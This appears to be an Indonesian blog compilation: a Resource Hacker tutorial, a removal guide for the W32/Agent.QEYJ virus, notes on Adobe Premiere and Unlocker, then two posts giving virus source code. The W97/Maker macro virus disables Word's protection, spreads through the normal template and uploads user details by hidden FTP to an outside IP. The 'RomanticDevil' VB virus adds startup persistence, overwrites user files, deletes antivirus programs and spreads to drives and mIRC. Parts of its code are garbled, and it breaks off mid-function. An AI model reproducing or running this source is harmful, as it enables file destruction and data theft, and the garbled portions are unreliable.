Otak Atik Windows Dengan Resource Hacker

Bagi yang hoby mengotak-atik atau memodifikasi windows, ada sebuah software yang dikenal dengan nama “Resource Hacker”. Pada kesempatan ini saya akan menjelaskan dasar-dasarnya saja.

Apakah Resource Hacker Itu?
Bagi yang belum tau kita baca dulu yuk...tapi bagi yang sudah tau abaikan saja OK!
Resource hacker adalah sebuah software freeware/gratis yang fungsinya untuk mengedit file-file yang tidak dapat di buka oleh program-program biasa, seperti file dengan extensi (.dll, .exe, .cpl dan masih banyak lagi).

Tool ini sangat membantu dalam melakukan modifikasi-modifikasi yang dilakukan pada sistem operasi windows. Misalnya kita ingin mengganti kata “Refresh” menjadi “Segarkan”. Ingin Mencoba ... download aja Resource Hacker disini. Anda tidak perlu menginstallnya cukup double click aja ResHacker.exe dengan icon palu.

Menggunakan Resource Hacker
Sebelum bekerja dengan resource hacker ada beberapa hal yang harus anda ketahui :

1. Program ini merupakan buatan manusia dan tak akan terlepas dari adanya bug pada program ketika digunakan


2. Resource Hacker Di compile (dibuat) menggunakan Delphi™ ver 3.02.


3. Rsource Hacker tidak dapat digunakan untuk membuka aplikasi/executable 16 BIT


4. Beberapa executable file yang dicompress menggunakan metode tertentu seperti upx atau metode lainnya mungkin tidak akan dapat dibuka atau berjalan dengan bai
   k.


5. Program ini hanya merubah tampilan saja dan tidak dapat digunakan untuk menambahkan fungsi baru pada sebuah program.

Bila anda membuka file di Resource Hacker, maka akan muncul direktori di sisi kiri panel, seperti:
AVI
Cursor
Bitmap
Icon
Menu
Dialog
String Table
AcceleratorsVersion Info
dan masih banyak lagi......

direktori ini bervariasi dari file ke file. Berikut ini adalah gambaran kecil dari direktori tersebut.

AVI : direktori ini berisi file AVI
Cursor : direktori ini berisi file CursorBitmap : direktori ini berisi bitmap
Icon : direktori ini berisi icon
Menu : direktori ini berisi berbagai menu
Dialog : direktori ini berisi berbagai kotak dialog
String Table : direktori ini berisi berbagai string
Accelerators : direktori ini berisi kunci pintas
Version Info : direktori ini berisi informasi versi dari file

Melihat Resources
Anda dapat melihat resource apapun yang ada dalam file. Cukup mengembangkan direktori dan klik pada nama resource. Sebenarnya setiap resource terdiri dari 3 bagian:

Resource Type: menunjukkan bahwa resource adalah AVI / Bitmap / Menu / Cursor / Icon / String / etc.
Resource Nama: Ini menggambarkan nama resource
Resource Language: bahasa yang digunakan dalam file. Untuk INGGRIS 1033

Mengubah Resouce
Untuk Cursor/Icon/Bitmap

1. Pilih resource (misalnya Bitmap -> 131 -> 1033)


2. Klik Action -> Replace Icon/Cursor/Bitmap


3. Ini akan mebuka jendela baru, klik Open file with new Icon/Cursor/Bitmap tombol.


4. Pilih resource yang diinginkan di kotak dialog OPEN dan klik pada tombol Open dan kemudian Replace.

Untuk Resource laninnya seperti AVI
Ini Sedikit berbeda

1. Klik Action -> Replace Other Resource...


2. Ini akan membuka jendela baru, klik open file with new resource


3. Pilih file dan klik tombol Open


4. Untuk memberikan informasi yang diperlukan untuk sumber daya ini, yang saya sebutkan sebelumnya.


5. Klik tombol Replace

Untuk Menu/String/Dialog
Untuk mengubah String / Menu / Dialog kotak, Pilih resource yang diinginkan, misalnya, String Table -> 4 -> 1033, dan buatlah perubahan kemudian klik tombol Compile Script.
Itu akan mengkompilasi script dan akan memberi tanda ERROR jika terjadi kesalahan sehingga anda bisa memperbaikinya.

Nah begitulah dasar-dasar Resource Hacker, selanjutnya saya akan posting lagi tips dan triknya di lain waktu.

Semoga Bermanfaat

virus W32/Agent.QEYJ

Siapa yang bisa mengembalikan file video yang dihapus ……. gua jadiin

pacar ??

Kalau ada virus yang bisa sampai membuat korbannya berbicara seperti kalimat di atas, tentulah itu virus W32/Agent.QEYJ karena virus ini tanpa ampun

menghancurkan file video di komputer korbannya dengan tuntas.

Bagi Anda yang suka mengkoleksi film/video, mulai sekarang mulailah berhati-hati jika tidak ingin kehilangan data film/video, virus ini masih

cukup “baik” karena ia tidak akan menghapus file lagu dalam format mp3. Jika anda berfikir untuk menggunakan program recovery sebaiknya disurutkan saja

niat tersebut karena dari hasil pengujian yang dilakukan tools tersebut belum dapat mengembalikan file yang sudah di hapus, selidik punya selidik

ternyata virus ini tidak sekedar menghapus tapi lebih dari itu ia akan merubah isi file tersebut, sehingga walaupun software recovery berhasil

mendapatkan file tersebut tetapi file yang anda dapat adalah file yang sudah terinfeksi / diubah oleh virus

Virus ini dibuat dengan menggunakan program bahasa assembly dengan ukuran file induk sekitar 66 KB, untuk mengelabui user ia akan menggunakan icon

”Windows Media Player Classic” dengan type file sebagai “application” Sebenarnya tidak terlalu sulit untuk mengetahui apakah komputer sudah

terinfeksi  virus ini salah satunya dengan munculnya file shortcut dengan ukuran 2KB disetiap drive, selain itu

munculnya file dengan icon ”Windows Media Player Classic” yang di simpan di direktori dimana anda menyimpan file film / video dengan ukuran file sebesar

66 KB atau 575 KB, tetapi file ini akan disembunyikan. (lihat gambar 1 dan 2)

Gambar 1, File induk W32/Agent.QEYJ

 

Gambar 2, File Shortcut virus

Dengan update terbaru Norman Security Suite mendeteksi virus ini sebagai

W32/Agent.QEYJ (lihat gambar 3)



Gambar 3, Hasil deteksi Norman Security Suite

File Induk

Pada saat file tersebut di jalankan oleh user, ia akan membuat beberapa file

induk berikut yang akan dijalankan secara otomatis pada saat komputer

dinyalakan:

C:\Program Files\Windows Media Player

Svchost.exe

Wmplayerc.exe

C:\Documents and Settings\client\My Documents\RÊCYCLÊR.com\RÊCYCLÊR

Autorun.inf (folder)

Registri Windows

Agar file tersebut dapat dijalankan secara otomatis, ia akan membuat

string pada registry berikut

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Windows Media Player = C:\Program Files\Windows Media Player\wmplayerc.exe

Selain dengan membuat string pada registri di atas, ia juga akan membuat shortcut  dengan ukuran 2 KB. File

shortcut ini mempunyai nama file yang sama dengan folder yang nantinya akan disembunyikan oleh virus tersebut, icon yang digunakannya pun akan

menyerupai icon folder, hal ini digunakan sebagai upaya untuk mengelabui user apalagi type yang tersebut adalah sebagai “File Folder” sungguh

penyamaran yang sempurna. File shortcut itu sendiri berisi script/link untuk menjalankan sebuah file virus yang berada di direktori “..\RÊCYCLÊR\  .com”

(lihat gambar 4)

 

 

Gambar 4, Link file shortcut yang dibuat oleh W32/Agent.QEYJ

Blok fungsi Windows

Virus ini tidak terlalu banyak melakukan blok terhadap tools / software

security, walaupun demikian ia akan merubah beberapa fungsi Windows seperti Windows Firewall atau Folder Options (tidak bisa menampilkan file yang

tersembunyi) dan beberapa fungsi Windows lainnya dengan membuat beberapa string pada registri berikut

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system

EnableLUA = 0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

DefaultValue = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

AntiVirusDisableNotify = 1

FirewallDisableNotify = 1

UpdatesDisableNotify = 1

AntiVirusOverride = 1

FirewallOverride = 1

UacDisableNotify = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc

AntiVirusDisableNotify = 1

FirewallDisableNotify = 1

UpdatesDisableNotify = 1

AntiVirusOverride = 1

FirewallOverride = 1

UacDisableNotify = 1

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control

WaitToKillServiceTimeout = 1000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

WaitToKillServiceTimeout = 1000

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PropSummary

Advanced = 0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\CmdMapping

NextId = 8193

{92780B25-18CC-41C8-B9BE-3C9C571A8263} =

8193

Babat abis file film / video

Bagi anda yang suka mengkoleksi film dengan berbagai format sebaiknya

berhati-hati karena virus ini akan mengincar sejumlah file yang mempunyai

ekstensi mpeg, avi, dat, atau mov. Virus ini tidak akan menghapus tetapi

lebih parah dari itu ia akan menulis ulang isi file tersebut, file yang

sudah di ubah akan mempunyai ukuran sebesar 66 KB tidak sampai disitu, file

duplikat ini akan di injeksi ulang dengan menambahkan kode virus sehingga

ukuran file virus membengkak menjadi 575 KB. Untuk mengelabui user ia akan

menggunakan rekayasa sosial yang cukup pintar yakni dengan menggunakan icon

“Windows Media Player Classic” dan akan menyembunyikan file tersebut, jika

diperhatikan saat ini jarang virus lokal yang akan menyembunyikan file

duplikat yang telah dibuat dan tetap di infeksi virus tetapi

justru trik ini sangat menarik dan

diluar dugaan karena biasanya user akan beranggapan file yang disembunyikan

oleh virus adalah file asli yang tidak terinfeksi virus.

Recovery file

dengan bantuan software recovery masih tidak mampu menolong banyak, karena

virus ini sudah merubah isi file tersebut maka file yang berhasil di

recovery pun adalah file-file yang sudah terinfeksi virus.

Hal lain yang akan dilakukan adalah akan menyembunyikan folder / sub folder

di setiap drive termasuk media flash disk atau removable disk, untuk

mengelabui user ia akan membuat file shortcut yang akan mempunyai nama file

yang sama dengan folder yang disembunyikan tersebut, file ini mempunyai

ukuran sekitar 2 KB dan berisi link untuk menjalankan file virus yang ada di

direktori  “RÊCYCLÊR\  .com”.

Agar  penyamarannya lebih

sempurna, ia juga akan memanipulasi type file dari file shortcut tersebut

menjadi “File Folder” dengan merubah string pada registry berikut : (lihat

gambar 5)

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile

[Default] = File Folder

 

 

Gambar 5, File duplikat dan file shortcut yang dibuat oleh W32/Agent.QEYJ

Media Penyebaran

Untuk menyebarkan dirinya, ia akan menggunakan media Flash Disk dengan cara

menyembunyikan folder/subfolder yang ditemui dan membuat shortcut yang

mempunyai nama yang sama dengan nama folder yang disembunyikan dengan ukuran

sekitar 2 kb.  File shortcut ini

berisi link untuk menjalankan file virus yang disimpan di direkori

“RÊCYCLÊR\  .com” (lihat gambar 6)

 

Gambar 6, Link shortcut yang dibuat oleh virus

Virus ini tidak akan aktif secara otomatis pada saat user akses ke drive /

flash disk, justru ia akan membuat folder kosong dengan nama “autorun.inf”

disetiap drive yang mempunyai atribut (system, hidden dan read only),

mungkin langkah ini dilakukan sebagai upaya agar virus lain tidak dapat

membuat script autorun virus sehingga virus tersebut tidak dapat aktif

secara otomatis pada saat user akses drive tersebut.

Cara mengatasi Trojan:W32/Agent.QEYJ

1. Nonaktifkan “System Restore”, selama proses pembersihan


2. Matikan proses virus yang aktif di memory, anda dapat menggunakan tools“Security Task Manager” dengan mendownload di alamat
   
   
   
   http://www.neuber.com/taskmanager/download.html (lihat gambar 7)

 

Gambar 7, Mematikan proses virus yang aktif di memori

Matikan proses virus yang mempunyai nama “svchost.exe” dan Multimedia Video

File” atau file yang mengarah ke direktori “..\Program Files\Windows Media

Player\”

1. Fix registry Windows yang sudah diubah oleh virus,untuk mempercepat proses
   
   perbaikan salin script dibawah ini pada program “notepad” kemudian
   
   simpan dengan nama “repainr.inf”. Jalankan file tersebut dengan
   
   cara, klik kanan “repair.inf” |
   
   klik “install”

[Version]

Signature=”$Chicago$”

Provider=Vaksincom Oyee

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]

 

HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”

HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”

HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”

HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”

HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”

 

HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0,

“Explorer.exe”

HKLM, SYSTEM\ControlSet001\Control, WaitToKillServiceTimeout,0, “2000″

HKLM, SYSTEM\CurrentControlSet\Control, WaitToKillServiceTimeout,0, “2000″

HKCU, Software\Microsoft\Internet Explorer\Extensions\CmdMapping,NextId,0,

“8194″

 

HKCU, Software\Microsoft\Internet

Explorer\Extensions\CmdMapping,{92780B25-18CC-41C8-B9BE-3C9C571A8263},0,

“8194″

HKLM, SOFTWARE\Classes\lnkfile,,,”Shortcut”

HKLM, SOFTWARE\Microsoft\Security Center,AntiVirusDisableNotify,0×00010001,0

HKLM, SOFTWARE\Microsoft\Security Center,FirewallDisableNotify,0×00010001,0

HKLM, SOFTWARE\Microsoft\Security Center,UpdatesDisableNotify,0×00010001,0

 

HKLM, SOFTWARE\Microsoft\Security Center,AntiVirusOverride,0×00010001,0

HKLM, SOFTWARE\Microsoft\Security Center,FirewallOverride,0×00010001,0

HKLM, SOFTWARE\Microsoft\Security Center,UacDisableNotify,0×00010001,0

 

 

[del]

HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Windows Media Player

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system, EnableLUA

 

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,

DefaultValue

HKLM, SOFTWARE\Microsoft\Security Center\Svc

HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\PropSummary

HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32

 

 

1. Hapus file induk yang dibuat oleh virus dengan terlebih dahulu
   menampilkan file yang disembunyikan terlebih dahulu, caranya : (lihat 
   
   gambar

 

ü



Buka Windows Explorer

ü



Klik menu “Tools”

Klik menu “View”

Klik “Folder Options”

Klik tabulasi “View”

Centang option “Show hidden files and folders”

Hilangkan tanda centang pada opsi “Hide extensions for known files types”

Hilangkan tanda centang pada opsi “Hide protected operating system

files (Recommended)”

Klik “OK”

 

Gambar 8, Setting Folder Optoins untuk menampilkan file yang disembunyikan

Kemudian hapus file berikut:

C:\Program Files\Windows Media Player

Svchost.exe

Wmplayerc.exe

C:\Documents and Settings\client\My Documents\RÊCYCLÊR

RÊCYCLÊR

(hapus di setia drive termasuk Flash Disk)

Hapus file shortcut  yang dibuat

oleh virus yang berada di disetiap drive termasuk flash disk

dengan ciri-ciri : (lihat gambar

9)

1. 
   
   
   
   1. Ukuran 2 KB (file shortcut)
   
   
   2. Icon “Folder” (file shortcut)
   
   
   
   

 

Gambar 9, Contoh file shortcut yang dibuat oleh virus

 

1. Hapus juga file duplikat yang dibuat oleh virus dengan ciri-ciri
   
   
   
   1. Ukuran 66 KB dan 575 KB
   
   
   2. Icon “Windows Media Player Classic”
   
   
   3. Type file “Application”
   
   
   
   

 

Lokasi file ini acak tergantung dimana anda menyimpan file film/video,

karena file duplikat ini akan dibuat di direktori yang sama dengan

penyimpanan file film/video tersebut. Oleh karena itu untuk mempercepat

proses pencarian dan penghapusan sebaiknya anda gunakan fungsi “Search

Windows”, seperti terlihat pada gambar di bawah ini : (lihat gambar 10)

 

 

Gambar 10, Mencari dan menghapus file duplikat virus

 

1. Tampilkan folder/subfolder yang disemunyikan,dengan cara : (lihat gambar
   11)

Klik menu “start”

Klik “Run”

Ketik CMD, kemudian klik tombol “OK”

Pindahkan posisi kursor ke lokasi drive yang akan di cek, kemudian ketik

perintah

ATTRIB

–S  –H

–R

/S  /D

 

 

 

Gambar 11, Menampilkan folder/sub folder yang disembunyikan

 

1. Untuk pembersihan optimal dan mencegah infeksi ulang install dan scandengan menggunakan antivirus  yang
   
   up-to-date. Anda juga dapat mendwnload Norman Malware Cleaner di alamat
   
   berikut:

 

http://www.norman.com/support/support_tools/58732/en

Edit Video Dengan Adobe Premiere

Adobe Premiere Pro dibuat oleh Adobe System Inc, yang merupakan versi pembaharuan dari beberapa versi Adobe Premiere terdahulu. Adobe Premiere Pro mulai di luncurkan ke pasaran pada bulan Agustus tahun 2003. Mulai versi 6.0 Adobe Premiere dapat digunakan untuk mengedit file video dengan format DV. Adobe Premiere telah menjadi program standar bagi para profesional dalam bidang digital video.

A. Fitur Baru Adobe Premiere Pro

Pada versi baru ini Adobe Premiere Pro hadir dengan tampilan baru, tetapi lebih simple dari para pendahulunya. Penamaan efek video serta transisinya sedikit mengalami perubahan sehingga membutuhkan waktu bagi para pengguna versi lama (6.0 dan 6.5) untuk menyesuaikan diri dalam tampilan yang baru ini. Beberapa fasilitas baru yang ada dalam Adobe Premiere Pro adalah :

• Real  Time  Rendering

Dengan  fasilitas  ini  memungkinkan  melihat  hasil  transisi  tanpa  melalui proses render.

• Adobe  Product  Integration

Yaitu  kita  dapat  menggunakan  berbagai  produk  Adobe  (Adobe Photoshop,  Adobe  After  Effects,  Adobe  Encore  DVD  dan  Adobe Audition)  untuk  bekerja sama dengan Adobe Premiere Pro.

• Audio  Mixer

Pada versi ini Adobe telah memperbarui fasilitas audio mixernya, yang mendukung track-based effects, submix tracks, mendukung proses perekaman voiceover langsung (dubbing), fasilitas panning untuk surround dan stereo dan VST filter.

• Color Correction

Adobe Premiere Pro mulai versi ini melengkapi dirinya dengan fasilitas eksklusif ini.  Fasilitas  ini  biasanya  terdapat  pada  software  editing  standar broadcast  (high-end).  Dengan adanya  fasilitas  ini  kita  dapat  dengan mudah  mengkoreksi  warna  clip  video  kita  sesuai  dengan keinginan.

• Motion Path

Pada versi yang baru ini Adobe PremierePro menerapkan prinsip keyframing untuk animasi perpindahan posisi pada klip-klip nya.

• Visual Effect yang dilengkapi dengan keyframe

Sehingga dapat dianimasikan dengan mudah.

• Fasilitas export dalam berbagai format

Adobe Premiere Pro menyediakan fasilitas ekspor kedalam berbagai format media seperti MPEG-1, MPEG-2, Microsoft DV, AVI dalam berbagai kompresi, Windows Media 9 Series dan Real Media 9.

 

B. Kebutuhan Komputer untuk Menjalankan Adobe Premiere Pro

PC (Personal Computer) digunakan untuk mengolah file video baik proses capture maupun editing menggunakan software Adobe Premiere Pro. PC yang akan digunakan minimal harus memiliki spesifikasi sebagai berikut :

• Processor Intel® Pentium® III – 800 Mhz


• RAM 256 Mb


• Harddiskberkecepatan 7200 rpm dengan kapasitas besar (space kosong minimal 20 Gb)


• VGA Card 32 Mb (resolusi monitor 1024x768 pixel)


• Sound Card yang mendukung DirectX


• CD-ROM/RW dan DVD-ROM/RW untuk menulis dalam format VCD maupun DVD


• DV Capture Card/IEEE 1394 Card


• Sistem Operasi Windows XP Home/Pro Edition

Untuk menggunakan Adobe Premiere Pro maka harus menggunakan Microsoft Windows XP sebagai sistem operasinya. Hal ini dikarenakan Adobe Premiere Pro hanya dapat berjalan pada sistem operasi tersebut. Lain dengan Adobe Premiere versi 6.5 yang masih dapat berjalan pada sistem operasi Windows 98SE dan Windows 2000.

Hapus File atau Folder yang Terkunci

error biasanya muncul akibat file ato folder tersebut di locked oleh program lain. dalam hal ini file ato folder yang di block tidak dapat di akses seperti di baca atopun di eksekusi,  dan juga gak bisa di copy atopun di delete.

kemungkinan error ini terjadi karena :

• Cannot delete file: Access is denied.


• There has been a sharing violation.


• The source or destination file may be in use.


• The file is in use by another program or user.


• Make sure the disk is not full or write-protected and that the file is not currently in use

salah satu cara untuk mngatasinya dengan reboot windows untuk menghentikan semua proses, tapi jika file ato folder ini di block oleh virus, walopun di rebootpun percuma.. gak ngefek… so kita bisa minta bantuan sopwer utility, salah satunya Unlocker. ada versi bahasa indonesianya coy..

Aplikasinya mudah kok digunakan, tinggal klik doang… gini neh caranya :

1. klik kanan file ato folder trus pilih unlocker


2. jika file to folder locked/terkunci, maka akan muncul list lockers di window


3. klik unlock.. dah.. selesai

Source Kode Virus W97/Maker.Ao

W97/Maker.Ao

Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables

Dim SaveDocument, SaveNormalTemplate, _

DocumentInfected, NormalTemplateInfected As Boolean

Dim ad, nt As Object

Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables

Set ad = ActiveDocument.VBProject.VBComponents.Item(1)

Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)

NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF

Options.VirusProtection = False

If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then

If DocumentInfected = True Then

LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

ElseIf NormalTemplateInfected = True Then

LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

End If

LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))

For I = 1 To 4

LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)

Next I

LogFile = "C:\hsf" & LogFile & ".sys"

Open LogFile For Output As #1

Print #1, LogData

Close #1

Open "c:\netldx.vxd" For Output As #1

Print #1, "o 209.201.88.110"

Print #1, "user anonymous"

Print #1, "pass itsme@"

Print #1, "cd incoming"

Print #1, "ascii"

Print #1, "put " & LogFile

Print #1, "quit"

Close #1

Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True

End If

'Make sure that some conditions are true before we continue infecting anything

If (DocumentInfected = True Xor NormalTemplateInfected = True) And _

(ActiveDocument.SaveFormat = wdFormatDocument Or _

ActiveDocument.SaveFormat = wdFormatTemplate) Then

'Infect the NormalTemplate

If DocumentInfected = True Then

SaveNormalTemplate = NormalTemplate.Saved

OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

'Write a log file of this NormalTemplate infection

For I = 1 To Len(Application.UserAddress)

If Mid(Application.UserAddress, I, 1) <> Chr(13) Then

If Mid(Application.UserAddress, I, 1) <> Chr(10) Then

UserAddress = UserAddress & Mid(Application.UserAddress, I, 1)

End If

Else

UserAddress = UserAddress & Chr(13) & "' "

End If

Next I

OurCode = OurCode & Chr(13) & _

"' " & Format(Time, "hh:mm:ss AMPM - ") & _

Format(Date, "dddd, d mmm yyyy") & Chr(13) & _

"' " & Application.UserName & Chr(13) & _

"' " & UserAddress & Chr(13)

nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines

nt.CodeModule.AddFromString OurCode

If SaveNormalTemplate = True Then NormalTemplate.Save

End If

'Infect the ActiveDocument

If NormalTemplateInfected = True And _

(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _

ActiveDocument.Saved = False) Then

SaveDocument = ActiveDocument.Saved

OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines

ad.CodeModule.AddFromString OurCode

If SaveDocument = True Then ActiveDocument.Save

End If

End If

End Sub

Source Kode Virus Romantic Devil

 

Rem Program Virus RomanticDevil.ß
Rem Create By : August
Public lihat_reg As Integer

Sub Main()
Dim Master As String
Dim Lokasi As String
Dim A, B, ngawur As Integer
Randomize
On Error Resume Next
False
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
Lokasi = App.path & "\"
Master = App.EXEName
Master = Lokasi & Master & ".exe"
Krjkn.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mixer", Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe"
Krjkn.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Mixer", Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe"
lihat_reg = Krjkn.regRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{7B7DF450-F119-11CD-84465-00CA00425E90}")
Obj.copyfile Master, Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe"
Obj.copyfile Master, "A:\Creadit Card.txt.exe"
&"\SysRoot32.dll.exe", vbHidden
If lihat_reg = "" Or lihat_reg <> 15 Then
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{7B7DF450-F119-11CD-84465-00CA00425E90}", lihat_reg + 1
End If
If lihat_reg >= 1 Then
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
End If
If lihat_reg = 2 Then
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "00000000", "REG_DWORD"
End If
If lihat_reg = 3 Then
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
End If
If lihat_reg >= 4 Then

End If
If lihat_reg = 5 Then
"HKCU\Control Panel\Desktop\WindowMetrics\Shell Icon Size", "132"
End If
If lihat_reg > 15 And lihat_reg < 31 Then
Gelap
pesan = "hanya test saja kok "
"RomanticDevil." & Chr(223)
ElseIf lihat_reg > 22 Then
pesan = "By:dr.Pluto"
MsgBox pesan, vbCritical + vbApplicationModal, "RomanticDevil." & Chr(223)
"Shutdown.exe -r"
End If
If lihat_reg = 6 Then
pesan = " RomanticDevil.B "
MsgBox pesan, vbExclamation + vbApplicationModal, "RomanticDevil.Beta"
End If

Call W23W58
Call Send_Outlook
End Sub


Sub W23W58()
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Set W84C10 = Obj.Drives
For Each W42Q62 In W84C10
If W42Q62.Drivetype = Remote Then
W20I84 = W42Q62 & "\"
Call Infect(W20I84)
ElseIf W42Q62.IsReady Then
W20I84 = W42Q62 & "\"
Call Infect(W20I84)
End If
Next
End Sub


Sub Infect(X94E78)
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Lokasi = App.path & "\"
Master = App.EXEName
Set X85W4 = Obj.GetFolder(X94E78)
Set X59Q23 = X85W4.Files
For Each X39I89 In X59Q23
Ext_file = Obj.GetExtensionName(X39I89.path)

If Ext_file = "htm" Or Ext_file = "html" Or Ext_file = "php" Then
Set C = Obj.CreateTextFile(X39I89.path, True)
C.WriteLine "</html><head><title>RomanticDevil</title><meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-1""></head> <body bgcolor=""#000000"" link=""#006600""> <p align=""right""> <font color=""#00FF00"" size=""6"" face=""Script""> <div align=""right""><font color=""#00FF00"" size=""6"" face=""Script""> A Woman 's heart is a deep ocean of secrets.</font></div><p align=""left""><font color=""#00FF00"" size=""6"" face=""Script"">But now you all know there was a man </font><font color=""#00FF00"" size=""6"" face=""Script"">named jack Dawson, and that he saved me,</font><font color=""#00FF00"" size=""6"" face=""Script"">in every way that a person can be saved.</font><p align=""right""><a href=""mailto:RomanticDevil@yahoo.com""><font size=""6"">Rose Dewitt Bukater</font></a></body></html>"
C.Close
End If
If Ext_file = "xls" Or Ext_file = "doc" Or Ext_file = "jpg" Or Ext_file = "gif" Or Ext_file = "mp3" Then
Set C = Obj.CreateTextFile(X39I89.path, True)
C.WriteLine vbCrLf & vbCrLf & " RomanticDevil." & Chr(223) & vbCrLf & "" & vbCrLf & " A Woman 's heart is a deep ocean of secrets" & vbCrLf & " But now you all know there was a man" & vbCrLf & " named jack Dawson, and that he saved me," & vbCrLf & " in every way that a person can be saved." & vbCrLf & "" & vbCrLf & " Rose Dewitt Bukater"
C.Close
End If
If Ext_file = "txt" Then
Obj.copyfile Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe", X39I89.path & ".exe", True
SetAttr X39I89.path & ".exe", vbNormal
Kill X39I89.path
End If
' fungsi menghapus anti 2 Virus
If X39I89.Name = "ALUNOTIFY.EXE" Or X39I89.Name = "mcdash.exe" Or X39I89.Name = "mcagent.exe" Then
Kill X39I89.path
End If
If X39I89.Name = Chr(109) & Chr(105) & Chr(114) & Chr(99) & ".ini" Or X39I89.Name = Chr(109) & Chr(105) & Chr(114) & Chr(99) & ".exe" Then
Fungsi_mIRC (X39I89.ParentFolder)
End If
If X39I89.Name = "Pirch32.exe" Then
Fungsi_Pirch (X39I89.ParentFolder)
End If
If lihat_reg > 15 Then
If Ext_file = "exe" Or Ext_file = "com" Then
Obj.copyfile Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe", X39I89.path, True
SetAttr X39I89.path, vbNormal
End If
End If
Next
Set X39I89 = X85W4.SubFolders
For Each X19I36 In X39I89
Call Infect(X19I36.path)
Next
End Sub

Function Fungsi_mIRC(path)
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
baca = "½µÅÔËÒÖ¿olÐ’ŸÑЂ“œ¬±«°œ…œÝolГŸ‚‚‘ËÈ‚Š‚†ÐËÅÍ‚ŸŸ‚†ÏÇ‚‹‚Ý‚ÊÃÎÖ‚ßolДŸ‚‚‘ÆÅÅ‚ÕÇÐÆ‚†ÐËÅÍ‚¥œ¾¹«°¦±¹µ¾µÛÕ´ÑÑÖ•”ÆÎΐÇÚÇolЕŸß"
If path = "" Then
If Obj.fileexists("" & Chr(67) & ":\" & Chr(109) & Chr(105) & "rc\" & Chr(109) & Chr(105) & "rc.ini") Then path = "" & Chr(67) & ":\" & Chr(109) & Chr(105) & "rc"
If Obj.fileexists("" & Chr(67) & ":\" & Chr(109) & Chr(105) & "rc32\" & Chr(109) & Chr(105) & "rc.ini") Then path = "" & Chr(67) & ":\mirc32"
P69R22 = Krjkn.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If Obj.fileexists(P69R22 & "\" & Chr(109) & Chr(105) & "rc\" & Chr(109) & Chr(105) & "rc.ini") Then path = P69R22 & "\" & Chr(109) & Chr(105) & "rc"
End If
If path <> "" Then
Set P35T19 = Obj.CreateTextFile(path & "\" & Chr(115) & "cript" & Chr(46) & "ini", True)
